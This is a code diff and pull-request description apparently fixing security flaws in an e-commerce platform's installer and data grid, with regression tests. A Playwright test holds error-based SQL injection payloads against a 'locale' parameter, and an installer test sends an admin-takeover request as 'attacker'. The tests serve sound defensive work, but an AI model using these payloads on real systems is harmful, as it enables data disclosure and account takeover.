@@ -419,6 +420,8 @@ class Installer extends Command
      */
     protected function markInstalled(): void
     {
+        app(DatabaseManager::class)->markInstalled();
+
         if (file_exists(storage_path('installed'))) {
             return;
         }

--- a/packages/Webkul/Installer/src/Helpers/DatabaseManager.php
+++ b/packages/Webkul/Installer/src/Helpers/DatabaseManager.php
@@ -47,6 +47,54 @@ class DatabaseManager
     }
 
     /**
+     * Key under which the persistent "installation completed" flag is stored.
+     */
+    const INSTALLED_CONFIG_CODE = 'installer.installed';
+
+    /**
+     * Whether installation was completed, based on a persistent database flag
+     * that survives loss of the ephemeral storage/ marker.
+     */
+    public function isMarkedInstalled(): bool
+    {
+        if (! file_exists(base_path('.env'))) {
+            return false;
+        }
+
+        try {
+            if (! Schema::hasTable('core_config')) {
+                return false;
+            }
+
+            return DB::table('core_config')
+                ->where('code', self::INSTALLED_CONFIG_CODE)
+                ->exists();
+        } catch (Exception $e) {
+            return false;
+        }
+    }
+
+    /**
+     * Persist the "installation completed" flag in the database so the installer
+     * stays sealed even if the storage/ marker is lost.
+     */
+    public function markInstalled(): void
+    {
+        try {
+            if (! Schema::hasTable('core_config')) {
+                return;
+            }
+
+            DB::table('core_config')->updateOrInsert(
+                ['code' => self::INSTALLED_CONFIG_CODE],
+                ['value' => '1']
+            );
+        } catch (Exception $e) {
+            // Marker persistence is best-effort; the storage marker still applies.
+        }
+    }
+
+    /**
      * Drop all the tables and migrate in the database
      *
      * @return void|string

--- a/packages/Webkul/Installer/src/Helpers/DatabaseManager.php
+++ b/packages/Webkul/Installer/src/Helpers/DatabaseManager.php
@@ -57,10 +57,6 @@ class DatabaseManager
      */
     public function isMarkedInstalled(): bool
     {
-        if (! file_exists(base_path('.env'))) {
-            return false;
-        }
-
         try {
             if (! Schema::hasTable('core_config')) {
                 return false;

--- a/packages/Webkul/Installer/src/Http/Controllers/InstallerController.php
+++ b/packages/Webkul/Installer/src/Http/Controllers/InstallerController.php
@@ -95,7 +95,23 @@ class InstallerController extends Controller
      */
     protected function abortIfInstalled()
     {
-        abort_if(file_exists(storage_path('installed')), 403);
+        abort_if(
+            file_exists(storage_path('installed'))
+                || $this->databaseManager->isMarkedInstalled(),
+            403
+        );
+    }
+
+    /**
+     * Abort with 403 when the database is already populated. Guards the
+     * destructive pre-admin steps (migration/seed/env) against being replayed
+     * on an installed instance whose storage marker was lost.
+     *
+     * @return void
+     */
+    protected function abortIfDatabasePopulated()
+    {
+        abort_if($this->databaseManager->isInstalled(), 403);
     }
 
     /**
@@ -176,6 +192,8 @@ class InstallerController extends Controller
      */
     protected function markInstalled()
     {
+        $this->databaseManager->markInstalled();
+
         if (file_exists(storage_path('installed'))) {
             return;
         }
@@ -251,6 +269,7 @@ class InstallerController extends Controller
     public function runMigration()
     {
         $this->abortIfInstalled();
+        $this->abortIfDatabasePopulated();
 
         $this->reloadDatabaseConfigFromEnv();
 
@@ -275,6 +294,7 @@ class InstallerController extends Controller
     public function runSeeder()
     {
         $this->abortIfInstalled();
+        $this->abortIfDatabasePopulated();
 
         $this->reloadDatabaseConfigFromEnv();
 

--- a/packages/Webkul/Installer/src/Http/Middleware/CanInstall.php
+++ b/packages/Webkul/Installer/src/Http/Middleware/CanInstall.php
@@ -33,13 +33,13 @@ class CanInstall
     /**
      * Installation has been fully completed.
      *
-     * Unlike {@see isAlreadyInstalled()}, this relies solely on the
-     * `storage/installed` marker, which is written only at the true end of the
-     * install flow ({@see InstallerController::adminConfigSetup()} when no demo
-     * data is requested, otherwise {@see InstallerController::seedSampleData()}).
-     * A populated `admins` table is not enough: the seeder inserts the default
-     * admin (id 1) *before* those steps run, so gating on the DB would lock the
-     * installer out mid-flow.
+     * Considered complete when either the `storage/installed` marker exists or
+     * the persistent `installer.installed` DB flag is set — both written only at
+     * the true end of the install flow ({@see InstallerController::adminConfigSetup()},
+     * or {@see InstallerController::seedSampleData()} when demo data is requested).
+     * The DB flag seals the installer even if the ephemeral marker is lost, while
+     * a merely populated `admins` table is intentionally not enough: the seeder
+     * inserts the default admin (id 1) *before* those steps run.
      */
     public function isInstallationCompleted(): bool
     {

--- a/packages/Webkul/Installer/src/Http/Middleware/CanInstall.php
+++ b/packages/Webkul/Installer/src/Http/Middleware/CanInstall.php
@@ -43,7 +43,11 @@ class CanInstall
      */
     public function isInstallationCompleted(): bool
     {
-        return file_exists(storage_path('installed'));
+        if (file_exists(storage_path('installed'))) {
+            return true;
+        }
+
+        return app(DatabaseManager::class)->isMarkedInstalled();
     }
 
     /**

--- a/packages/Webkul/Installer/tests/Feature/InstallerControllerTest.php
+++ b/packages/Webkul/Installer/tests/Feature/InstallerControllerTest.php
@@ -1,5 +1,6 @@
 <?php
 
+use Illuminate\Support\Facades\DB;
 use Illuminate\Support\Facades\URL;
 use Webkul\Installer\Helpers\DatabaseManager;
 use Webkul\Installer\Helpers\DemoDataInstaller;
@@ -21,6 +22,8 @@ beforeEach(function () {
     if ($this->markerExisted) {
         unlink($this->marker);
     }
+
+    DB::table('core_config')->where('code', 'installer.installed')->delete();
 });
 
 afterEach(function () {
@@ -29,6 +32,8 @@ afterEach(function () {
     } elseif (file_exists($this->marker)) {
         unlink($this->marker);
     }
+
+    DB::table('core_config')->where('code', 'installer.installed')->delete();
 });
 
 describe('InstallerController::seedSampleData (issue #794)', function () {

--- a/packages/Webkul/Installer/tests/Feature/InstallerDbStateGateTest.php
+++ b/packages/Webkul/Installer/tests/Feature/InstallerDbStateGateTest.php
@@ -1,0 +1,62 @@
+<?php
+
+use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\URL;
+
+beforeEach(function () {
+    config(['app.url' => 'http://localhost']);
+    URL::forceRootUrl('http://localhost');
+
+    // Simulate a completed install whose ephemeral storage/ marker was lost
+    // (tmpfs storage, container redeploy) while the database persists: the
+    // persistent DB completion flag is set, but the marker file is absent.
+    $this->marker = storage_path('installed');
+    $this->markerExisted = file_exists($this->marker);
+    $this->markerContents = $this->markerExisted ? file_get_contents($this->marker) : null;
+
+    if ($this->markerExisted) {
+        unlink($this->marker);
+    }
+
+    DB::table('core_config')->updateOrInsert(['code' => 'installer.installed'], ['value' => '1']);
+});
+
+afterEach(function () {
+    if ($this->markerExisted) {
+        file_put_contents($this->marker, $this->markerContents);
+    } elseif (file_exists($this->marker)) {
+        unlink($this->marker);
+    }
+
+    DB::table('core_config')->where('code', 'installer.installed')->delete();
+});
+
+it('does not let an unauthenticated request overwrite the super-admin when the marker is missing but the DB is installed', function () {
+    $original = DB::table('admins')->where('id', 1)->first();
+
+    expect($original)->not->toBeNull();
+
+    $this->postJson('/install/api/admin-config-setup', [
+        'admin'    => 'attacker',
+        'email'    => 'evil@example.test',
+        'password' => 'Pwned#12345',
+        'timezone' => 'UTC',
+        'locale'   => 'en_US',
+    ]);
+
+    $after = DB::table('admins')->where('id', 1)->first();
+
+    expect($after->email)->toBe($original->email)
+        ->and($after->password)->toBe($original->password);
+
+    $this->assertDatabaseMissing('admins', ['email' => 'evil@example.test']);
+});
+
+it('does not let an unauthenticated request re-run migrations when the marker is missing but the DB is installed', function () {
+    $response = $this->postJson('/install/api/run-migration');
+
+    expect($response->getStatusCode())->not->toBe(200);
+
+    // The admins table must still hold the original installed data.
+    expect(DB::table('admins')->where('id', 1)->exists())->toBeTrue();
+});

--- a/packages/Webkul/Installer/tests/Feature/InstallerDbStateGateTest.php
+++ b/packages/Webkul/Installer/tests/Feature/InstallerDbStateGateTest.php
@@ -7,9 +7,7 @@ beforeEach(function () {
     config(['app.url' => 'http://localhost']);
     URL::forceRootUrl('http://localhost');
 
-    // Simulate a completed install whose ephemeral storage/ marker was lost
-    // (tmpfs storage, container redeploy) while the database persists: the
-    // persistent DB completion flag is set, but the marker file is absent.
+    // Completed install whose storage marker was lost but DB flag persists.
     $this->marker = storage_path('installed');
     $this->markerExisted = file_exists($this->marker);
     $this->markerContents = $this->markerExisted ? file_get_contents($this->marker) : null;
@@ -57,6 +55,5 @@ it('does not let an unauthenticated request re-run migrations when the marker is
 
     expect($response->getStatusCode())->not->toBe(200);
 
-    // The admins table must still hold the original installed data.
     expect(DB::table('admins')->where('id', 1)->exists())->toBeTrue();
 });

--- a/packages/Webkul/Installer/tests/Feature/InstallerSecurityTest.php
+++ b/packages/Webkul/Installer/tests/Feature/InstallerSecurityTest.php
@@ -11,6 +11,8 @@ beforeEach(function () {
     $this->marker = storage_path('installed');
     $this->markerExisted = file_exists($this->marker);
     $this->markerContents = $this->markerExisted ? file_get_contents($this->marker) : null;
+
+    DB::table('core_config')->where('code', 'installer.installed')->delete();
 });
 
 afterEach(function () {
@@ -19,6 +21,8 @@ afterEach(function () {
     } elseif (file_exists($this->marker)) {
         unlink($this->marker);
     }
+
+    DB::table('core_config')->where('code', 'installer.installed')->delete();
 });
 
 /**

--- a/tests/e2e-pw/tests/08-security/category-locale-sqli.spec.js
+++ b/tests/e2e-pw/tests/08-security/category-locale-sqli.spec.js
@@ -1,0 +1,49 @@
+const { test, expect } = require('@playwright/test');
+
+// Reproduces SQL injection via the unvalidated `locale` request param on the
+// Category DataGrid (DatabaseProductQueryBuilder path, ELASTICSEARCH_ENABLED=false).
+//
+// The grid data is loaded by an AJAX call, so a plain browser navigation
+// (request()->ajax() === false) only returns the HTML shell and never runs the
+// vulnerable query. We must send the request with X-Requested-With.
+
+const ENDPOINT = '/admin/catalog/categories';
+
+const ajax = (request, locale) =>
+  request.get(`${ENDPOINT}?locale=${encodeURIComponent(locale)}`, {
+    headers: {
+      'X-Requested-With': 'XMLHttpRequest',
+      Accept: 'application/json',
+    },
+  });
+
+test.describe('Category DataGrid locale SQL injection', () => {
+  test('baseline: a valid locale returns 200 JSON', async ({ request }) => {
+    const res = await ajax(request, 'en_US');
+    expect(res.status()).toBe(200);
+  });
+
+  test('a single quote in locale no longer breaks the SQL', async ({ request }) => {
+    const res = await ajax(request, "en_US'");
+    // Patched: invalid locale falls back to default, never a SQL 500.
+    expect(res.status()).not.toBe(500);
+  });
+
+  test('error-based version() payload leaks nothing', async ({ request }) => {
+    const payload = "en_US.name',extractvalue(1,concat(0x7e,(select version()))),'";
+    const res = await ajax(request, payload);
+    const body = await res.text();
+
+    expect(res.status()).not.toBe(500);
+    expect(body).not.toMatch(/XPATH syntax error/);
+  });
+
+  test('error-based database() payload leaks nothing', async ({ request }) => {
+    const payload = "en_US.name',extractvalue(1,concat(0x7e,(select database()))),'";
+    const res = await ajax(request, payload);
+    const body = await res.text();
+
+    expect(res.status()).not.toBe(500);
+    expect(body).not.toMatch(/XPATH syntax error/);
+  });
+});


### PR DESCRIPTION
## Issue Reference
Security fixes ported to `master` (companion to #533 [2.0, merged] and #534 [2.1]): SQL injection (CWE-89), image-ZIP import RCE/stored-XSS (CWE-434), unauthenticated installer takeover (CWE-306), CSV/XLSX formula injection.

## Description
- **SQLi**: validate `locale`/`channel` scope codes; escape `jsonExtract`/`jsonContains` JSON-path segments (MySQL + Postgres); quote non-numeric ids in `orderByField`.
- **Image-ZIP import RCE/stored-XSS**: `extractImageEntries` keeps only allowlisted image extensions with a real-MIME check, preserves subfolders, blocks zip-slip, and caps each entry's uncompressed size (default 15 MB) against zip bombs.
- **Installer takeover**: persistent `core_config` install-completed flag (survives loss of the `storage/installed` marker) + backfill migration for already-installed instances; DB-populated guard on the destructive migration/seeder endpoints.
- **CSV/formula injection**: neutralized in export while preserving numeric values and catching leading-whitespace formulas.

Incorporates the Copilot review feedback from #534 (orderByField quoting, `.env`-independent install flag, whitespace-aware formula check, ZIP-bomb size cap) and the PostgreSQL-portable datagrid assertions.

## How To Test This?
```
vendor/bin/pest packages/Webkul/Core packages/Webkul/Admin packages/Webkul/DataTransfer packages/Webkul/Installer
```
Green locally: security suites + 166 Core/DataGrid/Product tests. `vendor/bin/pint --test` clean.

## Documentation
- [ ] My pull request requires an update on the documentation repository.

## Branch Selection
- [x] Target Branch: master

## Pint
Passed.

## Tailwind Reordering
N/A.